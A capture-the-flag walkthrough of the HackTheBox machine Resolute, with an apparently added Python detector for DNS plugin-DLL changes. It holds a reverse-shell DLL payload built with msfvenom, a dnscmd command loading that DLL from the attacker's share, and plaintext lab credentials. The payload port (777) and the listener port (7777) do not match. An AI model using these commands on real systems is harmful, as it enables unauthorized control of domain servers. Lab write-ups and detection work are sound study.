HackTheBox Resolute Walkthrough

In this article we are going to solve another boot2root challenge, Resolute, from HackTheBox.


walkthrough


As usual, we kick off with nmap to find the open ports and the services running on the target system, using the command


sudo nmap -sC -sV -o nmap.txt -Pn 10.10.10.169

So many ports are open. We start with SMB enumeration, and to find some open SMB shares we used the command

It looks like anonymous login is successful, but we have no SMB shares. We also tried some NULL authentication but got nothing. Next we tried another tool, rpcclient, as


rpcclient -U '' 10.10.10.169

After searching on the internet we found some useful commands we can use, and here we have used enumdomusers.

We have a list of usernames, and this can be useful in bruteforcing the password.

To gain some more information we decided to use another tool, enum4linux


enum4linux 10.10.10.169

This looks quite similar to the output we got from rpcclient above, but here we have a useful message: Account created. Password set to Welcome123!

Okay, we have usernames and a password, so we decided to bruteforce SMB using msfconsole.

We set all the required options and, because I don't like my terminal filling up with lots of data, set verbose to false. We got a hit for user melanie with password Welcome123!. So far we have found 0 SMB shares, so there is no use in logging in to SMB.

Now we try to connect to the machine as user melanie by using evil-winrm


sudo evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

Now we can read the user flag in the Desktop directory :)

It's time for some enumeration and manual searching, and after some time we found something interesting in C:\

The dir command doesn't give us a useful result, so we run the command ls -hidden to check for hidden directories and find one named PSTranscripts. We change our directory to this PSTr.... and there we find another hidden directory, and inside that hidden directory we have a .txt file. Let's try to read that file.

Okay, we have a username, ryan, and a password which is very long ( I didn't feel like typing it here ;)

Again we used the evil-winrm tool to connect to the machine, this time as user ryan.

We run the command whoami /groups to check all the groups and find this interesting group, DnsAdmins. We searched online about this group and found that it can be used to get RCE, so what we are going to do is

  1. Making a dll payload that sends a reverse shell back to our machine with msfvenom.

  2. Serving it using an SMB server to make it available to the Windows machine. We will also set up a netcat listener to catch our reverse shell.

  3. Importing that dll in the DNS server.

  4. Restarting the DNS server so that it loads the dll file.

Command used to prepare the payload


msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.28 LPORT=777 --platform=windows -f dll > haclabs.dll

Now we need to serve this payload, and for that we used SMBServer; the script can be found on our Kali Linux system.

Here rest is the name of our SMB share.

Next we need to import the dll into the DNS server, and for that we have used the command


dnscmd resolute /config /serverlevelplugindll \\10.10.15.28\rest\haclabs.dll

After that we have to restart the DNS server so that it can load our dll payload/file.

We have set up a listener on port 7777 to catch our reverse shell.
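From the defender's side, step 3 is visible in process-creation telemetry on the DNS server. The Python below is an added example, not part of the original walkthrough: it flags dnscmd command lines that set ServerLevelPluginDll and rates the DLL path. The event records, the user names other than ryan, and the trusted directory are assumptions.

```python
import ntpath
import re

TOKEN = re.compile(r'"[^"]*"|\S+')        # split on whitespace, keep quoted args whole
TRUSTED_DIR = "c:\\windows\\system32\\"   # assumption: approved plugins live only here

def plugin_dll_change(cmdline):
    """Return the DLL path when cmdline sets ServerLevelPluginDll via dnscmd, else None."""
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if not tokens or ntpath.basename(tokens[0]).lower() not in ("dnscmd", "dnscmd.exe"):
        return None
    lowered = [t.lower() for t in tokens]   # match switches case-insensitively
    if "/config" not in lowered or "/serverlevelplugindll" not in lowered:
        return None
    i = lowered.index("/serverlevelplugindll")
    return tokens[i + 1] if i + 1 < len(tokens) else ""

def severity(path):
    """Rate the configured path: remote UNC > local outside System32 > inside it."""
    if not path:
        return "review"                     # switch present but no value captured
    p = ntpath.normpath(path).lower()       # collapse ..\ tricks before comparing
    if p.startswith("\\\\"):
        return "high"
    if not p.startswith(TRUSTED_DIR):
        return "medium"
    return "low"                            # still a rare change worth confirming

def triage(events):
    """Return (user, dll_path, severity) for every plugin-DLL change seen."""
    findings = []
    for ev in events:
        path = plugin_dll_change(ev["cmdline"])
        if path is not None:
            findings.append((ev["user"], path, severity(path)))
    return findings

# Constructed records; only the first command line is taken from the walkthrough.
SAMPLE_EVENTS = [
    {"user": "ryan", "cmdline": r"dnscmd resolute /config /serverlevelplugindll \\10.10.15.28\rest\haclabs.dll"},
    {"user": "svc-dns", "cmdline": r'"C:\Windows\System32\dnscmd.exe" dc01 /Config /ServerLevelPluginDll "C:\Users\Public\plug in.dll"'},
    {"user": "admin1", "cmdline": r"dnscmd dc01 /enumzones"},
    {"user": "admin1", "cmdline": r"findstr /i serverlevelplugindll notes.txt"},
]

if __name__ == "__main__":
    for user, path, level in triage(SAMPLE_EVENTS):
        print(f"[{level}] {user} set ServerLevelPluginDll to {path}")
```

Any hit is worth following up, because this setting is rarely changed on a healthy DNS server, and membership of DnsAdmins should be reviewed alongside it.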


We are the admin user now and can read the final flag. Hope you like the walkthrough :)



© 2020 by HacLabs.